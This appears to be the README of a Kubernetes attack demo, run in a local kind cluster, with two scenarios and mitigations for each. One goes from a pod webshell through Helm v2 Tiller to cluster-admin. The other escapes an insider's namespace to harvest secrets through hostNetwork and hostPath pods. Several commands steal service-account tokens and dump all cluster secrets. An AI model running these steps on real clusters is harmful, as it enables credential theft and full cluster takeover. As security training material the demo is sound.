See: installing Kind
kind version
should return this version or later:
kind v0.6.1 go1.13.4 darwin/amd64
Use kind to create the customized cluster:
kind create cluster --config=kind/cluster.yaml --name=demo --image=docker.io/kindest/node:v1.16.3@sha256:70ce6ce09bee5c34ab14aec2b84d6edb260473a60638b1b095470a3a0f95ebec
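For reference, a `kind/cluster.yaml` that supports this demo needs to disable kind's default CNI so Calico can provide pod networking, and defines two nodes to match the pod listing below. A minimal sketch, shown in the current `kind.x-k8s.io/v1alpha4` config format (the kind v0.6.x release pinned above used an earlier config apiVersion, and the actual file in this repo may differ):

```yaml
# Sketch of a kind cluster config for running Calico.
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
networking:
  disableDefaultCNI: true   # skip kindnet; the Calico manifest applied next provides networking
nodes:
  - role: control-plane
  - role: worker
```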
Install Calico for NetworkPolicy support:
kubectl apply -f kind/calico.yaml
Verify the cluster is ready:
kubectl get pods -A
Should show:
NAMESPACE     NAME                                         READY   STATUS    RESTARTS   AGE
kube-system   calico-kube-controllers-778676476b-c2g4p     1/1     Running   0          54s
kube-system   calico-node-db4hq                            1/1     Running   0          54s
kube-system   calico-node-r6wfn                            1/1     Running   0          54s
kube-system   coredns-5644d7b6d9-579wk                     1/1     Running   0          31m
kube-system   coredns-5644d7b6d9-8mw2j                     1/1     Running   0          31m
kube-system   etcd-demo-control-plane                      1/1     Running   0          30m
kube-system   kube-apiserver-demo-control-plane            1/1     Running   0          30m
kube-system   kube-controller-manager-demo-control-plane   1/1     Running   0          30m
kube-system   kube-proxy-fwg7z                             1/1     Running   0          31m
kube-system   kube-proxy-knpph                             1/1     Running   0          31m
kube-system   kube-scheduler-demo-control-plane            1/1     Running   0          30m
This scenario demonstrates how a single pod compromise in a Kubernetes cluster with commonly found configurations can lead to privilege escalation, lateral movement, and ultimately full cluster access.
kubectl apply -f demo1/installation.yaml
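`demo1/installation.yaml` is not reproduced here; conceptually it deploys the vulnerable "dashboard" web application alongside a stock Helm v2 Tiller in `kube-system`. A hypothetical sketch of the dashboard half (image, labels, and port are illustrative assumptions, not the repo's actual values):

```yaml
# Hypothetical sketch: a web app with an embedded webshell behind a ClusterIP
# service, matching the port-forward and /webshell steps below.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: dashboard
spec:
  replicas: 1
  selector:
    matchLabels:
      app: dashboard   # assumed label, reused in the egress policy sketch later
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
        - name: dashboard
          image: example/dashboard:1.0   # hypothetical image
          ports:
            - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: dashboard
spec:
  selector:
    app: dashboard
  ports:
    - port: 8080
      targetPort: 8080
```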
- Create a local proxy to reach the "exposed" `dashboard` service:
kubectl port-forward service/dashboard 8080:8080
- Visit the `dashboard` by opening http://localhost:8080.
- Navigate to /webshell and provide the basic auth credentials. Explain that there are several ways to arrive at this point (a backdoored software library, an application vulnerability resulting in remote code execution, etc.).
- Now at a shell inside the `dashboard` pod, run a few commands such as `id`, `hostname`, and `env` to confirm we're inside a Kubernetes cluster.
- Download and run `kubectl`:
export PATH=/tmp:$PATH
cd /tmp; curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl; chmod +x kubectl
- Enumerate the `tiller` deployment running in `kube-system`:
curl -v tiller-deploy.kube-system:44134
- Download the `helm` client binary and run `helm ls`.
cd /tmp; curl -so helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz; tar zxvf helm.tar.gz; chmod +x linux-amd64/helm; cp linux-amd64/helm .
helm version --host=tiller-deploy.kube-system:44134
export HELM_HOST=tiller-deploy.kube-system:44134; helm ls
- `helm install` a privileged/hostPath deployment via a helm chart (sketched below):
curl -sLO https://github.com/bgeesaman/nginx-test/archive/v1.0.0.tar.gz
helm install v1.0.0.tar.gz
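What makes this chart dangerous is the combination of objects it templates: a privileged workload with a hostPath mount, plus a binding of its service account to `cluster-admin`. A compressed, hypothetical sketch of the effect (the actual chart contents may differ):

```yaml
# Hypothetical sketch: the pod's service account gains cluster-admin, and the
# container runs privileged with the node's root filesystem mounted.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: nginx-test-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: default
    namespace: default
---
apiVersion: v1
kind: Pod                 # the chart templates a deployment + service;
metadata:                 # a bare pod is shown here for brevity
  name: nginx-test
spec:
  containers:
    - name: webshell
      image: example/webshell:1.0   # hypothetical image answering on :8080
      securityContext:
        privileged: true            # full device access on the node
      volumeMounts:
        - name: host
          mountPath: /host          # the node's entire filesystem
  volumes:
    - name: host
      hostPath:
        path: /
```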
- Find/access the webshell with `curl` and run commands in the privileged pod as `cluster-admin`.
- Get the newly created pod's service account token; the helm chart bound it to `cluster-admin` during installation:
curl -XPOST -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token" nginx-test.default:8080
- Run `kubectl get secrets --all-namespaces` using the pod's mounted service account token as `cluster-admin`:
curl -XPOST -d "cmd=kubectl get secrets -A" nginx-test.default:8080
- Run `kubectl get secrets --all-namespaces -o yaml` using the pod's mounted service account token as `cluster-admin`:
curl -XPOST -d "cmd=kubectl get secrets -A -o yaml" nginx-test.default:8080
Mitigations that would prevent or limit this attack path:
- Container vulnerability scanning
- Admission control disallowing vulnerable container images
- Admission control disallowing container images from non-trusted container registries
- Admission control disallowing privileged/hostPath pods
- Network policy preventing egress from the web pod (see the sketch after this list)
- Network policy preventing ingress to the tiller pod
- TLS authentication on Tiller, or upgrading to Helm v3 (which removes Tiller entirely)
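A minimal sketch of the egress mitigation, assuming the dashboard pod carries the `app: dashboard` label used in the sketches above (not confirmed by this repo):

```yaml
# Hypothetical sketch: declaring the Egress policy type with no egress rules
# denies all outbound traffic from matching pods, so the webshell could not
# have reached Tiller or downloaded kubectl/helm. (This also blocks DNS.)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: dashboard-deny-egress
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: dashboard
  policyTypes:
    - Egress
```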
This scenario demonstrates how a malicious insider, or an attacker holding that insider's compromised credentials, who can merely create pods in a single namespace can escalate privileges, bypass network policy, and gain full cluster access.
- Exit the webshell and stop the `kubectl port-forward` if it is still running from demo1.
exit
kubectl apply -f demo1/installation.yaml # To ensure Tiller is installed
kubectl apply -f demo2/installation.yaml # RBAC and default ns network policy
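`demo2/installation.yaml` pairs namespace-scoped RBAC for the demo user with a `default`-namespace egress policy. A hypothetical sketch of the shape of those objects (the exact verbs, resources, and policy rules are assumptions):

```yaml
# Hypothetical sketch: [email protected] may manage pods (and the daemonset used
# later) in `default` only; an egress policy confines pod traffic to the
# namespace. Details are illustrative.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-creator
  namespace: default
rules:
  - apiGroups: [""]
    resources: ["pods", "pods/exec", "pods/log"]
    verbs: ["create", "get", "list", "watch"]
  - apiGroups: ["apps"]
    resources: ["daemonsets"]
    verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-creator
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pod-creator
subjects:
  - apiGroup: rbac.authorization.k8s.io
    kind: User
    name: [email protected]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-egress
  namespace: default
spec:
  podSelector: {}            # every pod in the namespace
  policyTypes:
    - Egress
  egress:
    - to:
        - podSelector: {}    # allow traffic to pods in this namespace only
```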
- Show that `[email protected]` can create pods in the `default` namespace but not in `kube-system`:
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default
- Deploy a simple pod:
kubectl --as [email protected] apply -f demo2/simplepod.yaml
- Get a shell in the pod:
kubectl --as [email protected] exec -it simplepod -- /bin/sh
- Attempt to reach `tiller` directly:
wget -qO - tiller-deploy.kube-system:44134
exit
- Deploy a `hostNetwork` pod that bypasses the namespace's egress network policy:
kubectl --as [email protected] apply -f demo2/hostnetwork.yaml
- Exec in, download the `helm` client binary, and run `helm ls` to show that it can control Tiller:
kubectl --as [email protected] exec -it hostnetwork -- /bin/sh
export PATH=/tmp:$PATH; cd /tmp; wget -qO helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz; tar zxvf helm.tar.gz; chmod +x linux-amd64/helm; cp linux-amd64/helm .
export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134; helm ls
exit
- As before, show that `[email protected]` can create pods in the `default` namespace but not in `kube-system`:
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default
- Deploy the hostPath daemonset that reads the contents of all secrets mounted on every node and writes them to stdout:
kubectl --as [email protected] apply -f demo2/daemonset.yaml
- Read the secrets from the daemonset's logs:
kubectl --as [email protected] logs -f daemonset/secret-logger --all-containers=true --since=1m
Mitigations that would prevent or limit this attack path:
- Container vulnerability scanning
- Admission control disallowing vulnerable container images
- Admission control disallowing container images from non-trusted container registries
- Admission control disallowing hostNetwork/privileged/hostPath pods
- Network policy preventing ingress to the tiller pod (see the sketch after this list)
- TLS authentication on Tiller, or upgrading to Helm v3 (which removes Tiller entirely)
- Audit logging for all activities, to surface RBAC failures on uncommon commands
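A minimal sketch of the Tiller ingress mitigation. The `app: helm, name: tiller` labels below match the stock Helm v2 Tiller deployment, but verify them in your cluster before relying on this:

```yaml
# Hypothetical sketch: declaring the Ingress policy type with no ingress rules
# means no client may connect to tiller-deploy:44134, closing off both demo
# paths to Tiller.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: tiller-deny-ingress
  namespace: kube-system
spec:
  podSelector:
    matchLabels:
      app: helm
      name: tiller
  policyTypes:
    - Ingress
```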
Clean up the demo resources and delete the cluster:
kubectl delete -f demo1/installation.yaml
kubectl delete -f demo2/simplepod.yaml
kubectl delete -f demo2/hostnetwork.yaml
kubectl delete -f demo2/daemonset.yaml
kubectl delete -f demo2/installation.yaml
kind delete cluster --name=demo